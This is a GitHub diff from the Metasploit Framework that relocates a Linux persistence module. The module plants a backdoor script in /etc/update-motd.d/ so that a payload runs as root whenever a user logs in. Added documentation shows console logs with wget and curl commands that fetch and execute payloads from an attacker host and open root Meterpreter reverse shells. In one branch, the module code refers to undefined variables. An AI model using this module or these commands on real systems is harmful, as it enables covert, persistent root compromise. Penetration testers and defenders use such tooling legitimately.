rapid7
diff --git a/‎documentation/modules/exploit/linux/local/motd_persistence.md‎
Lines changed: 0 additions & 37 deletions b/‎documentation/modules/exploit/linux/local/motd_persistence.md‎
Lines changed: 0 additions & 37 deletions
diff --git a/‎documentation/modules/exploit/linux/persistence/motd.md‎
Lines changed: 126 additions & 0 deletions b/‎documentation/modules/exploit/linux/persistence/motd.md‎
Lines changed: 126 additions & 0 deletions
diff --git a/‎modules/exploits/linux/local/motd_persistence.rb‎
Lines changed: 0 additions & 63 deletions b/‎modules/exploits/linux/local/motd_persistence.rb‎
Lines changed: 0 additions & 63 deletions
diff --git a/‎modules/exploits/linux/persistence/motd.rb‎
Lines changed: 102 additions & 0 deletions b/‎modules/exploits/linux/persistence/motd.rb‎
Lines changed: 102 additions & 0 deletions
@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+This is a post module that performs a persistence installation on a Linux system using [motd](https://manpages.debian.org/bookworm/manpages/motd.5.en.html).
+To trigger the persistence execution, an external event such as a user logging in to the system with SSH is required.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Obtain a session on the target machine
+3. `use exploit/linux/persistence/motd`
+4. `set session [session]`
+5. `exploit`
+
+## Options
+
+### BACKDOOR_NAME
+
+Specify the name of the file to insert in the motd directory. Defaults to `99-check-updates`
+
+### PAYLOAD_NAME
+
+Name of the payload file if a `cmd` payload is not used. Defaults to a random name
+
+## Scenarios
+
+### Ubuntu 18.04.3
+
+Initial access vector via web delivery
+
+```
+[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set srvport 8181
+srvport => 8181
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4545
+lport => 4545
+resource (/root/.msf4/msfconsole.rc)> set URIPATH l
+URIPATH => l
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 111.111.1.111:4545 
+[*] Using URL: http://111.111.1.111:8181/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO oQN8BXNV --no-check-certificate http://111.111.1.111:8181/l; chmod +x oQN8BXNV; ./oQN8BXNV& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:42870) at 2025-02-07 15:40:34 -0500
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+(Meterpreter 1)(/tmp) > getuid
+Server username: root
+(Meterpreter 1)(/tmp) > sysinfo
+Computer     : ubuntu18desktop.local
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 1)(/tmp) > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/motd 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/motd) > exploit
+[-] Msf::OptionValidateError One or more options failed to validate: SESSION.
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/motd) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/motd) > exploit
+[*] Command to run on remote host: curl -so ./rpNzsXNVDsZ http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./rpNzsXNVDsZ;./rpNzsXNVDsZ&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/persistence/motd) > 
+[*] Fetch handler listening on 111.111.1.111:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. /etc/update-motd.d/ is writable
+[*] /etc/update-motd.d/99-check-updates written
+[+] Payload will be triggered at user login
+[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250207.4101/ubuntu18desktop.local_20250207.4101.rc
+[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
+[*] Sending payload to 222.222.2.222 (curl/7.58.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:48696) at 2025-02-07 15:41:26 -0500
+[msf](Jobs:2 Agents:2) exploit(linux/persistence/motd) > sessions -i 2
+[*] Starting interaction with 2...
+(Meterpreter 2)(/) > getuid
+Server username: root
+```
+
+### Ubuntu 22.04
+
+```
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/motd_persistence
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/motd_persistence) > set session -1
+session => -1
+msf6 exploit(linux/local/motd_persistence) > exploit
+[*] /etc/update-motd.d/99-check-updates written
+msf6 exploit(linux/local/motd_persistence) > 
+[*] Sending stage (3045380 bytes) to 172.18.49.39
+[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
+msf6 exploit(linux/local/motd_persistence) > sessions -i -1
+[*] Starting interaction with 2...
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```
@@ -0,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::EXE # for generate_payload_exe
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/linux/local/motd_persistence'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'update-motd.d Persistence',
+        'Description' => %q{
+          This module will add a script in /etc/update-motd.d/ in order to persist a payload.
+          The payload will be executed with root privileges everytime a user logs in.
+          Root privileges are likely required to write to /etc/update-motd.d/.
+          Verified on Ubuntu 22.04
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Julien Voisin' ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+        'Payload' => {
+          'BadChars' => '#%\n"'
+        },
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [ ['Automatic', {}] ],
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '1999-01-01',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        },
+        'References' => [
+          ['URL', 'https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('BACKDOOR_NAME', [true, 'The filename of the backdoor', '99-check-updates']),
+      OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),
+    ])
+  end
+
+  def check
+    return CheckCode::Safe('/etc/update-motd.d/ does not exist') unless exists? '/etc/update-motd.d/'
+    return CheckCode::Safe('/etc/update-motd.d/ is not writable') unless writable? '/etc/update-motd.d/'
+
+    print_warning("#{datastore['BACKDOOR_NAME']} already exists") if exists? "/etc/update-motd.d/#{datastore['BACKDOOR_NAME']}"
+
+    CheckCode::Appears('/etc/update-motd.d/ is writable')
+  end
+
+  def install_persistence
+    update_path = '/etc/update-motd.d/'
+
+    backdoor_path = "#{update_path}/#{datastore['BACKDOOR_NAME']}"
+
+    if exists? backdoor_path
+      fail_with Failure::BadConfig, "#{backdoor_path} is already present"
+    end
+
+    if payload.arch.first == 'cmd'
+      write_file(backdoor_path, "#!/bin/sh\n#{payload.encoded}")
+    else
+      backdoor_path = datastore['WritableDir']
+      backdoor_path = backdoor_path.end_with?('/') ? backdoor_path : "#{backdoor_path}/"
+      backdoor_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
+      backdoor_path << backdoor_name
+      print_status("Uploading payload file to #{backdoor_path}")
+      upload_and_chmodx backdoor_path, generate_payload_exe
+      write_file(path, (autostart_stub + ["Exec=\"#{backdoor_path}\""]).join("\n"))
+      @clean_up_rc << "rm #{backdoor_path}\n"
+    end
+
+    write_file(backdoor_path, "#!/bin/sh\n#{payload.encoded}")
+    @clean_up_rc << "rm #{backdoor_path}\n"
+    chmod(backdoor_path, 0o755)
+    print_status "#{backdoor_path} written"
+    print_good('Payload will be triggered at user login')
+  end
+end